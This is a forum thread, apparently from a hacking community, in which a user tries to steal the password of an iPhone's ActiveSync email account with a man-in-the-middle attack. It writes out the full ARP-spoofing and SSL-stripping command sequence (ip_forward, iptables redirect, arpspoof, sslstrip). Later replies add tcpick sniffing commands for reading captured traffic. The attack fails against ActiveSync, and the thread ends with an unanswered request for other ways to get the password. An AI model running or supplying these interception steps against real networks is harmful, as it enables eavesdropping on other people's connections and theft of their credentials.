
Hacking ActiveSync with MITM - possible?


michael_kent123


Does anyone know about Microsoft ActiveSync? Link: https://en.wikipedia.org/wiki/Exchange_ActiveSync

Basically, it is the way in which iPhone users set up their Hotmail / Outlook account. You just enter the e-mail and password and ActiveSync checks that the information is correct. You don't need to enter the POP or IMAP or SMTP details.

Now, ActiveSync uses port 443 to transmit data. I thought that the username and password could be intercepted and recorded with SSL Strip. This is because the data is transmitted to the Microsoft server using HTTPS which is exactly what SSL Strip compromises when used on websites.

Here is how I set up SSL Strip. I know for a fact that this works as I tested it by logging in to e-mail sites on the iPhone.

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

arpspoof -i wlan1 gateway_ip

sslstrip -l 10000 -k

I then sent an e-mail from a different device to the iPhone. I used Wireshark, which showed that my iPhone's IP transmitted some HTTPS traffic. I assume that it logged into Microsoft servers to access the message. At this point, I am guessing that the username and password were sent to allow me to read the message. Wireshark shows a DNS request to outlook.office365.com and the iPhone's IP contacts an IP in the range 207.46.0.0 - 207.46.255.255, which is owned by Microsoft. This is HTTPS (over TCP) and TLSv1.2 protocols.

There is also a transmission to 132.245.0.0 - 132.245.255.255 which is Microsoft using IMAPS.

However, when I checked the SSL Strip log, nothing was recorded. Obviously, using ActiveSync is not the same as logging into an HTTPS website. But ActiveSync does use HTTPS, so I thought that SSL Strip might work. Clearly I was wrong.

Can anyone comment on this? Is there a way to acquire the password from an iPhone when the e-mail account is set up with ActiveSync? As more and more people move from computers to phones, I would have thought this would be an increasingly important attack vector.

Edited by michael_kent123

maybe sniff the traffic with another tool...

tcpick -i wlan0 -bPS -C

in a second terminal

tcpick -i wlan0 -bPC -C

The two above will show traffic in separate terminals: one is traffic to the server (GET request) and the other is the server response...

I like this tool as it's quick, clean and uses the same filter syntax as Wireshark... check and see if port 80 was used and what this data looks like...


maybe sniff the traffic with another tool...

Tcpick

I'll have to look into that tool when I have some time to play. Never heard of it, nice post.


Sourceforge is down atm but I'll look into this.

How does it sniff / intercept / overcome SSL communications?

I don't believe it does anything to overcome SSL. It merely lets you look at the request sent and the responses, so if it were, say, http vs https, you would see port 80 and all the info associated with it, vs SSL, which would show encrypted traffic. However, combine this sniffing with another tool to strip off the SSL and you should then be able to easily see what you want in these two terminals, such as passwords, usernames, etc.

Try http://sourceforge.net/projects/tcpick/?source=directory instead of the first Google search result, which I think is a bad link, or possibly the author hasn't fixed their uploaded internally hosted home page.


Sourceforge is down atm but I'll look into this.

How does it sniff / intercept / overcome SSL communications?

apt-get install tcpick

This tool is a lot like tcpdump or Wireshark... tcpick will show you raw traffic that is passing through your wlan/eth adapter... it can display great color and syntax; programmers will enjoy the lightweight look and feel...

if you're trying to understand how this SSL strip process works, then you need to watch the traffic as you perform your attack...

so... at this point... did you watch port 80?

tcpick -i wlan0 -bPS -C "port 80"

this will show all traffic going out to a server...

(GET /index.php HTTP/1.1)

tcpick -i wlan0 -bPC -C "port 80"

This will show all traffic coming back to you the client...

(HTTP/1.1 304 Not modified)

did the traffic even make it to port 80?


  • 2 weeks later...

I finally tried tcpick but had no success. Here is what I did.

Terminal 1:

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
arpspoof -i wlan0 192.168.1.1   # router IP

Terminal 2:

sslstrip -l 10000 -k

Terminal 3:

sudo tcpick -i wlan0 -bPS -C "port 443"

Terminal 4:

sudo tcpick -i wlan0 -bPC -C "port 443"

I then sent an e-mail from a different device to a Hotmail address which was setup on my iPhone with ActiveSync.

Tcpick showed HTTPS connections to Microsoft but did not collect any username:password combinations (neither did sslstrip.log).

The tcpick server shows content like:

...r......Y.t~swj......t..J...$.#.
.k.g.9.3...=.<.5./...&.%.......*.).....
...............C.........bay405-m.hotmail.com.
.................
..........3t..
....f...ba..L!g..Q*..fA '. +........7............x..[q..Z.J...}K........
\...%S2F..q.*X..._.T}v{......|FE..
......

The tcpick client just showed connections to Microsoft's IP addresses.

For example:

SYN-SENT 192.168.1.10:51999 > 207.46.11.152:https
SYN-SENT 192.168.1.10:53999 > 207.46.11.152:https
RESET 192.168.1.10:51999 > 207.46.11.152:https
RESET 192.168.1.10:51999 > 207.46.11.152:https

I also tried using tcpick -i wlan0 -bPC -C "port 80" and tcpick -i wlan0 -bPS -C "port 80" (as i8igmac suggested). However, no data was shown, just IP addresses.

Any ideas? Thanks.

